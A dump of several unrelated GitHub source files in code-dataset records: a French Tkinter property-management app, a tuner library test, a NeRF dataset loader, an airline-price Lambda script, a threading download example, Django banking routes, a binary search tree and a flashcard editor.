print(paiement)\n\n def chercher_paiement(self, reference):\n # Le corps de la fonction doit également être indenté\n for paiement in self.paiements:\n if paiement['reference'] == reference:\n return paiement\n return None\n\n# Module: Gestion des Locataires\nclass GestionLocataires:\n def __init__(self):\n self.locataires = []\n\n def ajouter_locataire(self, locataire):\n self.locataires.append(locataire)\n\n def supprimer_locataire(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du locataire à supprimer : \"))\n del self.locataires[index]\n\n def afficher_locataires(self):\n # Le corps de la fonction doit également être indenté\n for locataire in self.locataires:\n print(locataire)\n\n def chercher_locataire(self, nom):\n # Le corps de la fonction doit également être indenté\n for locataire in self.locataires:\n if locataire['nom'] == nom:\n return locataire\n return None\n\n# Module: Gestion des Employees\nclass GestionEmployes:\n def __init__(self):\n self.employes = []\n\n def ajouter_employe(self, employe):\n self.employes.append(employe)\n\n def supprimer_employe(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index de l'employé à supprimer : \"))\n del self.employes[index]\n\n def afficher_employes(self):\n # Le corps de la fonction doit également être indenté\n for employe in self.employes:\n print(employe)\n\n def chercher_employe(self, nom):\n # Le corps de la fonction doit également être indenté\n for employe in self.employes:\n if employe['nom'] == nom:\n return employe\n return None\n\n# Module: Gestion des Documents\nclass GestionDocuments:\n def __init__(self):\n self.documents = []\n\n def ajouter_document(self, document):\n self.documents.append(document)\n\n def supprimer_document(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du document à supprimer : \"))\n del self.documents[index]\n\n def afficher_documents(self):\n # Le corps de la fonction doit également être indenté\n for document in self.documents:\n print(document)\n\n def chercher_document(self, titre):\n # Le corps de la fonction doit également être indenté\n for document in self.documents:\n if document['titre'] == titre:\n return document\n return None\n\n# Module: Gestion des contacts\nclass GestionContacts:\n def __init__(self):\n self.contacts = []\n\n def ajouter_contact(self, contact):\n self.contacts.append(contact)\n\n def supprimer_contact(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du contact à supprimer : \"))\n del self.contacts[index]\n\n def afficher_contacts(self):\n # Le corps de la fonction doit également être indenté\n for contact in self.contacts:\n print(contact)\n\n def chercher_contact(self, nom):\n # Le corps de la fonction doit également être indenté\n for contact in self.contacts:\n if contact['nom'] == nom:\n return contact\n return None\n\n# Module: Comptabilite\nclass Comptable:\n def __init__(self):\n self.transactions = []\n\n def ajouter_transaction(self, transaction):\n self.transactions.append(transaction)\n\n def supprimer_transaction(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index de la transaction à supprimer : \"))\n del self.transactions[index]\n\n def afficher_transactions(self):\n # Le corps de la fonction doit également être indenté\n for transaction in self.transactions:\n print(transaction)\n\n def calculer_solde(self):\n # Le corps de la fonction doit également être indenté\n solde = sum(self.transactions)\n return solde\n\n# Module: Analyse de Rentabilité\nclass AnalyseRentabilite:\n def __init__(self):\n self.depenses = []\n self.revenus = []\n\n def ajouter_depense(self, depense):\n self.depenses.append(depense)\n\n def ajouter_revenu(self, revenu):\n self.revenus.append(revenu)\n\n def calculer_depenses(self):\n # Le corps de la fonction doit être indenté\n total_depenses = sum(self.depenses)\n return total_depenses\n\n def calculer_revenus(self):\n # Le corps de la fonction doit également être indenté\n total_revenus = sum(self.revenus)\n return total_revenus\n\n def calculer_profit(self):\n # Le corps de la fonction doit également être indenté\n total_profit = self.calculer_revenus() - self.calculer_depenses()\n return total_profit\n \n\n\n\n# Application principale avec interface utilisateur Tkinter\nclass Application(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Gestion Immobilière\")\n self.geometry(\"800x600\")\n\n # Créez un notebook pour organiser les onglets de fonctionnalités\n notebook = ttk.Notebook(self)\n notebook.pack(expand=True, fill=\"both\")\n\n # Ajoutez des onglets pour chaque fonctionnalité\n propriete_tab = ttk.Frame(notebook)\n notebook.add(propriete_tab, text=\"Gestion des propriétés\")\n\n locataire_tab = ttk.Frame(notebook)\n notebook.add(locataire_tab, text=\"Gestion des locataires\")\n\n paiement_tab = ttk.Frame(notebook)\n notebook.add(paiement_tab, text=\"Gestion des paiements\")\n\n rapport_financier_tab = ttk.Frame(notebook)\n notebook.add(rapport_financier_tab, text=\"Rapports financiers\")\n\n employe_tab = ttk.Frame(notebook)\n notebook.add(employe_tab, text=\"Gestion des employés\")\n\n document_tab = ttk.Frame(notebook)\n notebook.add(document_tab, text=\"Gestion des documents\")\n\n contact_tab = ttk.Frame(notebook)\n notebook.add(contact_tab, text=\"Gestion des contacts\")\n\n rentabilite_tab = ttk.Frame(notebook)\n notebook.add(rentabilite_tab, text=\"Analyse de rentabilité\")\n\n comptabilite_tab = ttk.Frame(notebook)\n notebook.add(comptabilite_tab, text=\"Comptabilité\")\n\n # Ajoutez des widgets (boutons, tableaux, etc.) pour chaque fonctionnalité\n # Gestion des propriétés\n ajouter_propriete_btn = ttk.Button(propriete_tab, text=\"Ajouter une propriété\", command=self.ajouter_propriete)\n ajouter_propriete_btn.pack()\n modifier_propriete_btn = ttk.Button(propriete_tab, text=\"Modifier une propriété\", command=self.modifier_propriete)\n modifier_propriete_btn.pack()\n supprimer_propriete_btn = ttk.Button(propriete_tab, text=\"Supprimer une propriété\", command=self.supprimer_propriete)\n supprimer_propriete_btn.pack()\n\n # Gestion des locataires\n ajouter_locataire_btn = ttk.Button(locataire_tab, text=\"Ajouter un locataire\", command=self.ajouter_locataire)\n ajouter_locataire_btn.pack()\n modifier_locataire_btn = ttk.Button(locataire_tab, text=\"Modifier un locataire\", command=self.modifier_locataire)\n modifier_locataire_btn.pack()\n supprimer_locataire_btn = ttk.Button(locataire_tab, text=\"Supprimer un locataire\", command=self.supprimer_locataire)\n supprimer_locataire_btn.pack()\n\n # Gestion des paiements\n ajouter_paiement_btn = ttk.Button(paiement_tab, text=\"Ajouter un paiement\", command=self.ajouter_paiement)\n ajouter_paiement_btn.pack()\n modifier_paiement_btn = ttk.Button(paiement_tab, text=\"Modifier un paiement\", command=self.modifier_paiement)\n modifier_paiement_btn.pack()\n supprimer_paiement_btn = ttk.Button(paiement_tab, text=\"Supprimer un paiement\", command=self.supprimer_paiement)\n supprimer_paiement_btn.pack()\n \n # Gestion des employés\n ajouter_employe_btn = ttk.Button(employe_tab, text=\"Ajouter un employé\", command=self.ajouter_employe)\n ajouter_employe_btn.pack()\n modifier_employe_btn = ttk.Button(employe_tab, text=\"Modifier un employé\", command=self.modifier_employe)\n modifier_employe_btn.pack()\n supprimer_employe_btn = ttk.Button(employe_tab, text=\"Supprimer un employé\", command=self.supprimer_employe)\n supprimer_employe_btn.pack()\n\n # Gestion des documents\n ajouter_document_btn = ttk.Button(document_tab, text=\"Ajouter un document\", command=self.ajouter_document)\n ajouter_document_btn.pack()\n modifier_document_btn = ttk.Button(document_tab, text=\"Modifier un document\", command=self.modifier_document)\n modifier_document_btn.pack()\n supprimer_document_btn = ttk.Button(document_tab, text=\"Supprimer un document\", command=self.supprimer_document)\n supprimer_document_btn.pack()\n\n # Gestion des contacts\n ajouter_contact_btn = ttk.Button(contact_tab, text=\"Ajouter un contact\", command=self.ajouter_contact)\n ajouter_contact_btn.pack()\n modifier_contact_btn = ttk.Button(contact_tab, text=\"Modifier un contact\", command=self.modifier_contact)\n modifier_contact_btn.pack()\n supprimer_contact_btn = ttk.Button(contact_tab, text=\"Supprimer un contact\", command=self.supprimer_contact)\n supprimer_contact_btn.pack()\n\n # Analyse de rentabilité\n calculer_rentabilite_btn = ttk.Button(rentabilite_tab, text=\"Calculer la rentabilité\", command=self.calculer_rentabilite)\n calculer_rentabilite_btn.pack()\n\n # Comptabilité\n ajouter_operation_btn = ttk.Button(comptabilite_tab, text=\"Ajouter une opération\", command=self.ajouter_operation)\n ajouter_operation_btn.pack()\n modifier_operation_btn = ttk.Button(comptabilite_tab, text=\"Modifier une opération\", command=self.modifier_operation)\n modifier_operation_btn.pack()\n supprimer_operation_btn = ttk.Button(comptabilite_tab, text=\"Supprimer une opération\", command=self.supprimer_operation)\n supprimer_operation_btn.pack()\n","repo_name":"CREUSAT/GI","sub_path":"gestion_immo/app/interface_utilisateur/Interface_Utilisateur.py","file_name":"Interface_Utilisateur.py","file_ext":"py","file_size_in_byte":14373,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41405529494","text":"import pytest\n\nfrom ynca import BandTun\nfrom ynca.subunits.tun import Tun\n\nSYS = \"SYS\"\nSUBUNIT = \"TUN\"\n\nINITIALIZE_FULL_RESPONSES = [\n (\n (SUBUNIT, \"AMFREQ\"),\n [\n (SUBUNIT, \"AMFREQ\", \"1080\"),\n ],\n ),\n (\n (SUBUNIT, \"AVAIL\"),\n [\n (SUBUNIT, \"AVAIL\", \"Ready\"),\n ],\n ),\n (\n (SUBUNIT, \"BAND\"),\n [\n (SUBUNIT, \"BAND\", \"FM\"),\n ],\n ),\n (\n (SUBUNIT, \"FMFREQ\"),\n [\n (SUBUNIT, \"FMFREQ\", \"101.60\"),\n ],\n ),\n (\n (SUBUNIT, \"RDSINFO\"),\n [\n (SUBUNIT, \"RDSPRGTYPE\", \"RDS PRG TYPE\"),\n (SUBUNIT, \"RDSPRGSERVICE\", \"RDS PRG SERVICE\"),\n (SUBUNIT, \"RDSTXTA\", \"RDS RADIO TEXT A\"),\n (SUBUNIT, \"RDSTXTB\", \"RDS RADIO TEXT B\"),\n (SUBUNIT, \"RDSCLOCK\", \"RDS CLOCK\"),\n ],\n ),\n (\n (SYS, \"VERSION\"),\n [\n (SYS, \"VERSION\", \"Version\"),\n ],\n ),\n]\n\n\n@pytest.fixture\ndef initialized_tun(connection) -> Tun:\n connection.get_response_list = INITIALIZE_FULL_RESPONSES\n tun = Tun(connection)\n tun.initialize()\n return tun\n\n\ndef test_initialize(connection, update_callback):\n\n connection.get_response_list = INITIALIZE_FULL_RESPONSES\n\n tun = Tun(connection)\n tun.register_update_callback(update_callback)\n\n tun.initialize()\n\n assert tun.band is BandTun.FM\n assert tun.amfreq == 1080\n assert tun.fmfreq == 101.60\n\n\ndef test_am(connection, initialized_tun: Tun):\n\n initialized_tun.band = BandTun.AM\n connection.put.assert_called_with(SUBUNIT, \"BAND\", \"AM\")\n\n # Set value and test stepsize handling (which is why it becomes 1000)\n initialized_tun.amfreq = 999\n connection.put.assert_called_with(SUBUNIT, \"AMFREQ\", \"1000\")\n\n\ndef test_fm(connection, initialized_tun: Tun):\n\n initialized_tun.band = BandTun.FM\n connection.put.assert_called_with(SUBUNIT, \"BAND\", \"FM\")\n\n # Set value and test stepsize handling (which is why it becomes 100.00)\n initialized_tun.fmfreq = 100.05\n connection.put.assert_called_with(SUBUNIT, \"FMFREQ\", \"100.00\")\n\n\ndef test_rds(connection, initialized_tun: Tun):\n\n # Updates from device\n connection.send_protocol_message(SUBUNIT, \"RDSPRGSERVICE\", \"rds prg service\")\n assert initialized_tun.rdsprgservice == \"rds prg service\"\n\n connection.send_protocol_message(SUBUNIT, \"RDSPRGTYPE\", \"rds prg type\")\n assert initialized_tun.rdsprgtype == \"rds prg type\"\n\n connection.send_protocol_message(SUBUNIT, \"RDSTXTA\", \"radiotext a\")\n assert initialized_tun.rdstxta == \"radiotext a\"\n\n connection.send_protocol_message(SUBUNIT, \"RDSTXTB\", \"radiotext b\")\n assert initialized_tun.rdstxtb == \"radiotext b\"\n","repo_name":"mvdwetering/ynca","sub_path":"tests/test_tun.py","file_name":"test_tun.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"21850372657","text":"import jittor as jt\nfrom jittor import nn\nfrom jittor.dataset import Dataset\nimport numpy as np\nfrom ImageEncoder import ImageEncoder\n\n\ndef sample_rays_np(H, W, f, c2w):\n i, j = np.meshgrid(np.arange(W, dtype=np.float32), np.arange(H, dtype=np.float32), indexing='xy')\n dirs = np.stack([(i - W * .5 + 0.5) / f, -(j - H * .5 + 0.5) / f, -np.ones_like(i)], -1)\n rays_d = np.sum(dirs[..., None, :] * c2w[:3, :3], -1)\n rays_o = np.broadcast_to(c2w[:3, -1], np.shape(rays_d))\n return rays_o, rays_d\n\n\ndef get_dataset(data_dir, n, is_shuffle=False):\n data = np.load(data_dir)\n images = data['images']\n poses = data['poses']\n focal = data['focal']\n train_list = shuffle_id(images.shape[0], n, is_shuffle)\n H, W = images.shape[1:3]\n rays = create_ray_batches(images, poses, train_list, H, W, focal)\n\n train_images = jt.array(images[train_list]).permute(0, 3, 1, 2)\n encoder = ImageEncoder()\n encoder.eval()\n with jt.no_grad():\n reference_feature = encoder(train_images)\n # print(reference_feature.shape, reference_feature.sum(2).sum(2))\n # exit()\n # reference_feature => tensor(n, 512, 50, 50)\n return RaysDataset(rays), ReferenceDataset(reference_feature, poses[train_list], focal, H)\n\ndef shuffle_id(n, k, is_shuffle=False):\n train_list = np.arange(n)\n if is_shuffle:\n np.random.shuffle(train_list)\n train_list = train_list[:k]\n return train_list\n\n\ndef create_ray_batches(images, poses, train_list, H, W, f):\n print(\"Create Ray batches!\")\n rays_o_list = list()\n rays_d_list = list()\n rays_rgb_list = list()\n for i in train_list:\n img = images[i]\n pose = poses[i]\n rays_o, rays_d = sample_rays_np(H, W, f, pose)\n rays_o_list.append(rays_o.reshape(-1, 3))\n rays_d_list.append(rays_d.reshape(-1, 3))\n rays_rgb_list.append(img.reshape(-1, 3))\n rays_o_npy = np.concatenate(rays_o_list, axis=0)\n rays_d_npy = np.concatenate(rays_d_list, axis=0)\n rays_rgb_npy = np.concatenate(rays_rgb_list, axis=0)\n rays = jt.array(np.concatenate([rays_o_npy, rays_d_npy, rays_rgb_npy], axis=1))\n return rays\n\n\nclass RaysDataset(Dataset):\n def __init__(self, rays):\n super().__init__()\n self.rays = rays\n\n def __len__(self):\n return self.rays.shape[0]\n\n def __getitem__(self, idx):\n return self.rays[idx]\n\n\nclass ReferenceDataset:\n def __init__(self, reference, c2w, f, img_size):\n self.reference = reference\n self.scale = (img_size / 2) / f\n self.n = c2w.shape[0]\n self.R_t = jt.array(c2w[:, :3, :3]).permute(0, 2, 1)\n self.camera_pos = jt.array(c2w[:, :3, -1])\n self.c2w = c2w\n self.img_size = img_size\n self.f = f\n\n @jt.no_grad()\n def feature_matching(self, pos):\n n_rays, n_samples, _ = pos.shape\n pos = pos.unsqueeze(dim=0).expand([self.n, n_rays, n_samples, 3])\n camera_pos = self.camera_pos[:, None, None, :]\n camera_pos = camera_pos.expand_as(pos)\n ref_pos = jt.linalg.einsum(\"kij,kbsj->kbsi\", self.R_t, pos-camera_pos)\n uv_pos = ref_pos[..., :-1] / ref_pos[..., -1:] / self.scale\n uv_pos[..., 1] *= -1.0\n return nn.grid_sample(self.reference, uv_pos, align_corners=True, padding_mode=\"border\")\n\n","repo_name":"Jittor/JNeRF","sub_path":"contrib/pixelnerf/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":596,"dataset":"github-code","pt":"21"} +{"seq_id":"36588885525","text":"from get_prices import Get_Prices\r\nfrom datetime import datetime, date, time, timedelta\r\nfrom expertflyer import ExpertFlyer\r\nimport random, re, csv, pytz, time_zone, json, boto3, contextlib\r\nfrom typing import List, Dict\r\n\r\n\r\nprice_getter = Get_Prices(is_lamda=True)\r\n\r\n\r\n\r\ndef get_prices_and_seats(flights: List) -> List[List[Dict[str, str]]]:\r\n \"\"\"\r\n Get the prices and booking classes from a list of flights.\r\n \"\"\"\r\n airlines = [\"UA\", \"FR\", \"DL\", \"WN\"]\r\n airports = get_all_airports()\r\n prices_and_seats = []\r\n\r\n for flight in flights:\r\n airline = flight[\"flight\"].replace(\" \",\"\")[:2]\r\n if airline not in airlines:\r\n continue\r\n\r\n try:\r\n time_zone_of_depart_airport = pytz.timezone(airports[flight[\"depart_airport\"]])\r\n except KeyError:\r\n continue\r\n\r\n current_time_and_date = datetime.now(time_zone_of_depart_airport)\r\n current_time = current_time_and_date.time()\r\n current_time = datetime.combine(date.min, current_time) - datetime.min\r\n current_date = current_time_and_date.date()\r\n\r\n depart_time = flight[\"depart_time\"]\r\n depart_time = datetime.strptime(depart_time, \"%I:%M %p\").time()\r\n depart_time = datetime.combine(date.min, depart_time) - datetime.min\r\n\r\n\r\n if flight[\"frequency\"] != \"Daily\":\r\n parsed_frequency = flight[\"frequency\"].split(\",\")\r\n time_differences = []\r\n for frequency in parsed_frequency:\r\n diff_bw_today_and_flight_day = time_zone.time_between_given_date_and_next_weekday(time_zone.weekdays[frequency], current_date, time_zone_of_depart_airport)\r\n time_till_flight = (diff_bw_today_and_flight_day - current_time) + depart_time\r\n time_differences.append(time_till_flight.total_seconds())\r\n\r\n index_of_least_difference = time_differences.index(min(time_differences))\r\n time_to_departure = time_differences[index_of_least_difference]\r\n date_of_departure = time_zone.get_next_weekday(time_zone.weekdays[parsed_frequency[index_of_least_difference]], time_zone_of_depart_airport)\r\n else:\r\n time_to_departure = depart_time - current_time\r\n time_to_departure = time_to_departure.total_seconds()\r\n date_of_departure = current_time_and_date.date()\r\n\r\n date_str = date_of_departure.strftime(\"%Y-%m-%d\")\r\n\r\n bracket_free_flight_name = re.sub(r\"[\\(\\[].*?[\\)\\]]\", \"\", flight[\"flight\"])\r\n try:\r\n if 0 < time_to_departure < 6 * 3600:\r\n price_and_classes = price_getter.get_flight_prices_online_specific(airline, bracket_free_flight_name.replace(\" \",\"\"), flight[\"depart_airport\"], flight[\"arriving_airport\"], date_str)\r\n print(price_and_classes, flight[\"flight\"])\r\n prices_and_seats.extend(price_and_classes)\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\n return prices_and_seats\r\n\r\n\r\n\r\n\r\n'''\r\nLoads all airports from a CSV stored in S3 in folder script-data/\r\n'''\r\ndef get_all_airports() -> List:\r\n # These airports should be loaded from S3, for now I'm just hard coding some for testing\r\n airports = {}\r\n with open('/home/zain/Documents/airline_stats.csv') as fileObject:\r\n next(fileObject)\r\n reader_obj = csv.reader(fileObject)\r\n for row in reader_obj:\r\n airports[row[0]] = row[1]\r\n return airports\r\n\r\ndef get_all_flights() -> List:\r\n print(\"Getting all flights\")\r\n\r\n airports = get_all_airports()\r\n expertflyer = ExpertFlyer()\r\n flights = []\r\n for airport in airports:\r\n timetables = expertflyer.flight_timetables_from_airport(airport)\r\n flights.extend(timetables)\r\n data = json.dumps(timetables)\r\n with open(\"flights.json\", \"a\") as fp:\r\n fp.write(data)\r\n return flights\r\n\r\n'''\r\nStores all the flights in S3 in a folder called script-data/\r\n'''\r\ndef store_flights(flights):\r\n pass\r\n\r\n\r\n'''\r\nLoads the flights a folder script-data in S3\r\n'''\r\ndef load_flights():\r\n flights = None\r\n return flights\r\n\r\n'''\r\nStores the prices_and_seats data to S3 in raw-data/api/\r\n'''\r\ndef store_prices_and_seats(prices_and_seats):\r\n with open(\"prices_classes.json\", \"w\") as fp:\r\n fp.write(json.dumps(prices_and_seats))\r\n\r\ndef handle_errors(exception):\r\n subject = \"ERROR in META script\"\r\n body = str(exception)\r\n # Connect to AWS SES and send an email to \"johan.land@gmail.com\" with the subject and body above\r\n\r\n sender_email = 'johan.land@gmail.com'\r\n ses = boto3.client('ses')\r\n\r\n ses.send_email(\r\n Source=sender_email,\r\n Destination={\r\n \"ToAddresses\": [\"gachhadar.anand@gmail.com\", \"johan.land@gmail.com\"]\r\n },\r\n Message={\r\n 'Subject': {\r\n 'Data': subject,\r\n 'Charset': 'UTF-8'\r\n },\r\n 'Body': {\r\n 'Text': {\r\n 'Data': body,\r\n 'Charset': 'UTF-8'\r\n }\r\n }\r\n }\r\n )\r\n\r\ndef lambda_handler(event, context):\r\n #try:\r\n\r\n if event[\"action\"] == \"GetAllFlights\":\r\n flights = get_all_flights()\r\n store_flights(flights)\r\n elif event[\"action\"] == \"GetPricesAndSeats\":\r\n #flights = load_flights()\r\n #flights = get_all_flights()\r\n with open(\"flights.json\") as fp:\r\n airport_flights = json.loads(fp.read())\r\n\r\n prices = []\r\n for flight in airport_flights:\r\n data = get_prices_and_seats(flight)\r\n prices.append(data)\r\n store_prices_and_seats(prices)\r\n else:\r\n print(\"Bad action\")\r\n return {\r\n 'statusCode': 202,\r\n 'body': \"Error: Bad action\"\r\n }\r\n\r\n return {\r\n 'statusCode': 200,\r\n 'body': \"Completed Successfully.\"\r\n }\r\n '''\r\n except Exception as e:\r\n handle_errors(e)\r\n return {\r\n 'statusCode': 202,\r\n 'body': \"Error.\"\r\n }\r\n '''\r\n\r\n#lambda_handler({\"action\":\"GetAllFlights\"}, None)\r\nlambda_handler({\"action\":\"GetPricesAndSeats\"}, None)\r\n","repo_name":"abdulzain6/Airline-DataProcessing","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72791829174","text":"import urllib3\nfrom threading import Thread\nimport threading\n\nurllib3.disable_warnings()\n\nclass TestThread(Thread):\n def __init__(self, file_name, url):\n Thread.__init__(self, name=file_name)\n self.file_name = file_name\n self.url = url\n\n # the run method will automatically be run in a new thread everytime\n def run(self):\n time.sleep(1)\n\n curr_thread = threading.currentThread()\n print(f\"State of thread { curr_thread.name } in run: { repr(curr_thread) }. Is the Thread alive? { curr_thread.isAlive() }\")\n\n print(f\"Downloading the contents of { self.url } into { self.file_name } from { threading.currentThread().name }\")\n http = urllib3.PoolManager()\n\n response = http.request(method=\"GET\", url=self.url)\n with open(self.file_name, \"wb\") as f:\n f.write(response.data)\n\n print(f\"Download of { self.url } done\")\n\n\nif __name__ == \"__main__\":\n test_dict = {\n \"Google\": \"http://www.google.com\",\n # \"Python\": \"http://www.python.org\",\n \"Bing\": \"http://www.bing.com\",\n # \"Yahoo\": \"http://www.yahoo.com\"\n }\n for key in test_dict:\n test = TestThread(key, test_dict[key])\n test.start()\n\n\n\n\"\"\"\nDoing it the function way\n\n\ndef run_in_a_thread():\n print(\"Name of the current thread is {}\".format(threading.current_thread().name))\n\nif __name__ == \"__main__\":\n\n for i in range(2):\n new_thread = Thread(target=run_in_a_thread)\n new_thread.start()\n\n\n\"\"\"","repo_name":"Xceptions/python-distributed-and-concurrent-programming","sub_path":"run_thread.py","file_name":"run_thread.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24796213262","text":"from django.urls import path\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom .views import UserListView, UserchangeListView, AccountCreate, SignUp, Friendspay, abheben, RequestforAccount\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n path('', (UserListView.as_view(template_name='bankaccoount_list.html')), name='article-list'),\n path('change/', (UserchangeListView.as_view(template_name='change_list.html')), name='article-list'),\n path('user/einzahlen/', AccountCreate.as_view(), name='create_account'),\n path('user/friendspay/', Friendspay.as_view(template_name='user_friendspay.html', success_url=\"/\"), name='friendspay'),\n path('mitarbeiter/einzahlungen/', AccountCreate.as_view(), name='create_account'),\n path('mitarbeiter/bankeröffnung/', (AccountCreate.as_view(template_name='mitarbeiter_bankeröffnung.html', success_url=\"/app/\")), name='Bankaccounteröffnung'),\n path('mitarbeiter/accounteröffnen/', (SignUp.as_view(template_name='mitarbeit_accounteröffnen.html', success_url=\"/app/\")), name='Kontoeröffnen'),\n path('user/friendspay/error_blance/', TemplateView.as_view(template_name='balance_low.html')),\n path('user/friendspay/same_account/', TemplateView.as_view(template_name='same_account.html')),\n path('user/request/', RequestforAccount.as_view(template_name='user_request_account.html', success_url=\"/\"), name='request'),\n]","repo_name":"etiiiR/Project_M183","sub_path":"Moneyshare/bankaccount/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30121361565","text":"from pprint import pformat\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n def __repr__(self):\n from pprint import pprint\n if self.left is None and self.right is None:\n return str(self.val)\n return pformat({self.val: {'left': self.left, 'right': self.right}})\n\n def __str__(self):\n return str(self.val)\n\nclass BinarySearchTree:\n def __init__(self, root = None) -> None:\n self.root = root\n\n def insert(self, val):\n if self.root is None:\n self.root = Node(val)\n else:\n self.__insert(val, self.root)\n\n def __insert(self, val, node):\n if val < node.val:\n if node.left is None:\n node.left = Node(val)\n else:\n self.__insert(val, node.left)\n else:\n if node.right is None:\n node.right = Node(val)\n else:\n self.__insert(val, node.right)\n\n def search(self, val):\n if self.root is None:\n return False\n return self.__search(val, self.root)\n\n def __search(self, val, node):\n if node is None:\n return False\n if node.val == val:\n return True\n if val < node.val:\n return self.__search(val, node.left)\n else:\n return self.__search(val, node.right)\n\n def delete(self, val):\n if self.root is None:\n return False\n return self.__delete(val, self.root)\n\n def __delete(self, val, node):\n if node is None:\n return False\n if val < node.val:\n node.left = self.__delete(val, node.left)\n elif val > node.val:\n node.right = self.__delete(val, node.right)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n else:\n node.val = self.__find_min(node.right)\n return node\n\n def __find_min(self, node):\n if node.left is None:\n return node.val\n return self.__find_min(node.left)\n\n def __str__(self):\n return str(self.root)\n\n def get_max(self, node=None):\n if node is None:\n node = self.root\n if node.right is None:\n return node.val\n return self.get_max(node.right)\n\n def get_min(self, node=None):\n if node is None:\n node = self.root\n if node.left is None:\n return node.val\n return self.get_min(node.left)\n\n def preorder_traverse(self, node):\n if node is not None:\n yield node\n yield from self.preorder_traverse(node.left)\n yield from self.preorder_traverse(node.right)\n\n def inorder_traverse(self, node):\n if node is not None:\n yield from self.inorder_traverse(node.left)\n yield node\n yield from self.inorder_traverse(node.right)\n\n def postorder_traverse(self, node):\n if node is not None:\n yield from self.postorder_traverse(node.left)\n yield from self.postorder_traverse(node.right)\n yield node\n\n def inorder(self, arr: list, node: Node):\n if node is not None:\n self.inorder(arr, node.left)\n arr.append(node.val)\n self.inorder(arr, node.right) \n\n def find_kth_largest(self, k):\n arr = []\n self.inorder(arr, self.root)\n return arr[-k]\n\n def find_kth_smallest(self, k):\n arr = []\n self.inorder(arr, self.root)\n return arr[k-1]\n\ndef postorder(curr_node):\n node_list = []\n if curr_node is not None:\n node_list.extend(postorder(curr_node.left))\n node_list.extend(postorder(curr_node.right))\n node_list.append(curr_node.val)\n return node_list\n\ndef binary_search_tree():\n testList = [5, 3, 6, 2, 4, None, 7]\n t = BinarySearchTree()\n for i in testList:\n t.insert(i)\n\n print(t)\n\n if t.search(3):\n print(\"Found\")\n else:\n print(\"Not Found\")\n\n t.delete(3)\n print(t)\n\n print(t.get_max())\n print(t.get_min())\n\n print(t.find_kth_largest(2))\n print(t.find_kth_smallest(2))\n\n print(list(t.preorder_traverse(t.root)))\n print(list(t.inorder_traverse(t.root)))\n print(list(t.postorder_traverse(t.root)))\n\n print(postorder(t.root))\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n\n #binary_search_tree()\n","repo_name":"DavidZhiXing/Blog","sub_path":"leetcode/python/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72627229493","text":"import tkinter as tk\r\nfrom tkinter.filedialog import askdirectory\r\nimport tkinter.messagebox\r\nimport os.path\r\n#fcInfoFrm - .pack(expand = True)\r\ndef browseForPath():\r\n fcPathEnt.delete(0, tk.END)\r\n fcPathEnt.insert(0, tk.filedialog.askdirectory(title = \"Choose save location\", initialdir = \"..\"))\r\n\r\ndef nfRunFlash():\r\n import runFlash\r\n runFlash.runFlashCards(False,txtFilePath)\r\n \r\ndef handleButton(hbBtn):\r\n #Save current card\r\n getQVal = cnqTxtQ.get(\"1.0\", \"end-1c\")\r\n getAVal = cnqTxtA.get(\"1.0\", \"end-1c\")\r\n qList[cardInfo[1]] = [getQVal, getAVal]\r\n #Handle the button request\r\n if hbBtn == 0:\r\n cardInfo[0] += 1\r\n cardInfo[1] += 1\r\n cardInfo[2] += 1\r\n qList.insert(cardInfo[1],[])\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n elif hbBtn == 1:\r\n if cardInfo[0] == 1:\r\n False\r\n else:\r\n cardInfo[0] -= 1\r\n cardInfo[1] -= 1\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n cnqTxtQ.insert(1.0, qList[cardInfo[1]][0])\r\n cnqTxtA.insert(1.0, qList[cardInfo[1]][1])\r\n elif hbBtn == 2:\r\n cardInfo[0] += 1\r\n cardInfo[1] += 1\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n cnqTxtQ.insert(1.0, qList[cardInfo[1]][0])\r\n cnqTxtA.insert(1.0, qList[cardInfo[1]][1])\r\n elif hbBtn == 3:\r\n if cardInfo[0] != 1:\r\n qList.pop(cardInfo[1])\r\n cardInfo[0] -= 1\r\n cardInfo[1] -= 1\r\n cardInfo[2] -= 1\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, 